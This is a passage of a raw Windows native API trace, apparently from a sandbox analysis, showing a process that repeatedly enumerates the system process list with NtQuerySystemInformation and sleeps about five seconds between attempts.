ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0185.443] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0185.649] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0185.650] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0185.735] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0185.735] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0185.736] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0185.736] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0185.736] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0186.082] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0186.082] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0186.087] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0186.087] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0186.089] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0186.089] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0186.089] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0186.306] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0186.307] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0186.316] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0186.316] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0186.317] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0186.318] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0186.318] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0186.476] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0186.477] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0186.480] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0186.481] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0186.482] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0186.482] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0186.482] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0186.660] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0186.660] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0186.664] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0186.664] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0186.665] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0186.665] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0186.665] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0186.788] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0186.789] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0186.806] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0186.806] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0186.807] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0186.808] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0186.811] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0187.019] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0187.020] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0187.028] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0187.028] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0187.029] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0187.029] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0187.030] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0187.316] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0187.317] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0187.325] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0187.325] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0187.327] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0187.327] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0187.327] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0187.516] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0187.517] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0187.524] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0187.525] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0187.527] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0187.527] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0187.528] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0187.658] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0187.658] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0187.675] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0187.675] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0187.676] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0187.677] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0187.677] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0187.811] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0187.811] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0187.856] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0187.857] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0187.858] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0187.858] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0187.858] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0188.266] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0188.266] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0188.270] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0188.271] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0188.272] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0188.272] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0188.272] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0188.490] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0188.491] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0188.499] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0188.499] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0188.500] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0188.500] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0188.500] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0188.617] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0188.617] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0188.622] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0188.622] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0188.623] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0188.624] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0188.624] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0188.735] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0188.736] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0188.739] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0188.740] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0188.740] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0188.741] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0188.741] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0188.886] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0188.886] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0188.896] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0188.896] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0188.897] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0188.897] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0188.897] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0189.084] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0189.085] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0189.094] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0189.094] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0189.095] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0189.096] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0189.096] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0189.291] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0189.292] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0189.295] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0189.295] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0189.300] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0189.300] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0189.300] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0189.567] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0189.568] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0189.601] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0189.601] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0189.602] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0189.602] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0189.602] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0189.787] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0189.788] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0189.791] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0189.791] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0189.792] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0189.792] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0189.792] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0190.010] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0190.014] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0190.018] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: 